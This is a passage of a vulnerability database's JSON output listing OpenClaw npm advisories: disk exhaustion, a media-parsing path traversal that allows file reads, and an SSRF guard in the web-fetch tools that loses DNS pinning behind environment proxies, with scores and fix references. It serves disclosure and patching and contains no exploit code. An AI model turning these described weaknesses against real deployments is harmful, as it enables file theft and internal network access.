/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:35:12Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-disk-exhaustion-via-media-download-bypass"},{"reference_url":"https://github.com/advisories/GHSA-4g5x-2jfc-xm98","reference_id":"GHSA-4g5x-2jfc-xm98","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4g5x-2jfc-xm98"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73
v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83
u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41408","GHSA-4g5x-2jfc-xm98"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2wr9-h42m-a7ev"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89250?format=json","vulnerability_id":"VCID-32zs-2zs9-uufs","summary":"OpenClaw: Media Parsing Path Traversal Leads to Arbitrary File Read\n## Summary\nOpenClaw <= 2026.3.24 Media Parsing Path Traversal to Arbitrary File Read\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `4797bbc5b96e2cca5532e43b58915c051746fe37` — 2026-03-25T13:35:16-06:00\n\n## Release Process Note\n- The fix is already present in released version 
`2026.3.28`.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/4797bbc5b96e2cca5532e43b58915c051746fe37","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/4797bbc5b96e2cca5532e43b58915c051746fe37"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f6pf-4gjx-c94r","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f6pf-4gjx-c94r"},{"reference_url":"https://github.com/advisories/GHSA-f6pf-4gjx-c94r","reference_id":"GHSA-f6pf-4gjx-c94r","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f6pf-4gjx-c94r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-
26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-
da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-
t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-f6pf-4gjx-c94r"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vul
nerablecode.io/vulnerabilities/VCID-32zs-2zs9-uufs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50574?format=json","vulnerability_id":"VCID-34hg-6fw2-wfax","summary":"OpenClaw's web tools strict URL guard could lose DNS pinning when env proxy is configured\n`openclaw` web tools strict URL fetch paths could lose DNS pinning when environment proxy variables are configured (`HTTP_PROXY`/`HTTPS_PROXY`/`ALL_PROXY`, including lowercase variants).\n\nIn affected builds, strict URL checks (for example `web_fetch` and citation redirect resolution) validated one destination during SSRF guard checks, but runtime connection routing could proceed through an env-proxy dispatcher, so the connection was no longer pinned to the address the guard had validated.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22181","reference_id":"","reference_type":"","scores":[{"value":"0.00066","scoring_system":"epss","scoring_elements":"0.20644","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00066","scoring_system":"epss","scoring_elements":"0.20687","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00066","scoring_system":"epss","scoring_elements":"0.20703","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22181"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/345abf0b2e0f43b0f229e96f252ebf56f1e5549e","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L"},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_
system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-18T16:03:39Z/"}],"url":"https://github.com/openclaw/openclaw/commit/345abf0b2e0f43b0f229e96f252ebf56f1e5549e"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-dns-pinning-bypass-via-environment-proxy-configuration-in-web-fetch","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L"},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-18T16:03:39Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-dns-pinning-bypass-via-environment-proxy-configuration-in-web-fetch"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22181","reference_id":"CVE-2026-22181","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22181"},{"reference_url":"https://github.com/advisories/GHSA-8mvx-p2r9-r375","reference_id":"GHSA-8mvx-p2r9-r375","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8mvx-p2r9-r375"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8mvx-p2r9-r375","reference_id":"GHSA-8mvx-p2r9-r375","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_e
lements":""},{"value":"6.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-18T16:03:39Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8mvx-p2r9-r375"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13b
n"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jyg
q"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-